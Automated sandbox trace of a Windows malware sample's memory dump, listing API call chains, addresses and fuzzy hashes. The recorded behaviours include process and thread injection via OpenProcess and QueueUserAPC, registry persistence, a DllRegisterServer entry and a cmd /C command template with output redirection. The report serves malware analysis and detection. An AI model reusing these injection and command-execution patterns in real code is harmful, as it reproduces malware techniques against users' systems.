  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap
  • String ID: Main
  • API String ID: 1238789381-521822810
  • Opcode ID: 430bf3c3e099aaf98ba0d13378e5d8da2de179d3274a2f5d09db6df723472999
  • Instruction ID: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
  • Opcode Fuzzy Hash: CAE026B00A45C5AA403B7C81647B2F29410F9A08C20CD976BEE009F28CAE4670A27B9A
  • Instruction Fuzzy Hash: 8f29cc0f23f969ede819062a95f7fcd74d74c9a74bdfea75fafa15d21f68d3cc
APIs
  • RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
  • HeapFree.KERNEL32(00000000,?), ref: 001C428F
  • RegCloseKey.ADVAPI32(?), ref: 001C4298
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
  • Instruction Fuzzy Hash: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
  • lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: lstrlen$RtlAllocateHeap
  • String ID: [FILE]$DllRegisterServer
  • API String ID: 2544908171-3029713317
  • Opcode ID: 2d4b95e8c34fd7eb35c32aaba08f5fcf9921a6e8c8be63207aa385bfa2f516c2
  • Instruction ID: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
  • Opcode Fuzzy Hash: 73C012709914038B04177926842423CC68A39957E540E0619E8473611A5B0302CD5A1E
  • Instruction Fuzzy Hash: 5cabe30f11294075a22546247cc9a04f0ebb488a8614786e1935660b83a97d3e
APIs
  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle
  • String ID:
  • API String ID: 3688636283-0
  • Opcode ID: 8985e94ed4e404b0795d5a875a1daa6f27baf4ecdfa99c2ebdf40c8ebc5b8d94
  • Instruction ID: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
  • Opcode Fuzzy Hash: 55E0DCF28AC2C40BA8172662105D30B034AAB811E6AEC0393D361F00A6BB0F22DB5D4A
  • Instruction Fuzzy Hash: 283d28c9ebffde5815507237fddad0c111e69e01867ba4e75a4d178179002479
APIs
  • GetModuleHandleA.KERNEL32(001EC88E,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB44F
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
  • GetCommandLineW.KERNEL32(00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB466
  • CreateThread.KERNEL32(00000000,00000000,001C6C08,00000000,00000000,001CD6FE), ref: 001CB485
  • CloseHandle.KERNEL32(00000000), ref: 001CB490
  • GetLastError.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CB498
    • Part of subcall function 001C6241: GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
    • Part of subcall function 001C6241: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001CB35F: CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
    • Part of subcall function 001CB35F: GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
    • Part of subcall function 001CB35F: GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
    • Part of subcall function 001CB35F: Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
    • Part of subcall function 001CB35F: OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
    • Part of subcall function 001CB35F: QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
    • Part of subcall function 001CB35F: Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
    • Part of subcall function 001C8215: TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C822A
    • Part of subcall function 001C47EC: memcpy.NTDLL(001EA06C,?,00000028,00000000,001EC1F2,?,001CD6FE,?,?,00000000,001CB4E0,00000000,00000000), ref: 001C481E
    • Part of subcall function 001C47EC: HeapFree.KERNEL32(00000000,?,001EC1F2), ref: 001C484F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
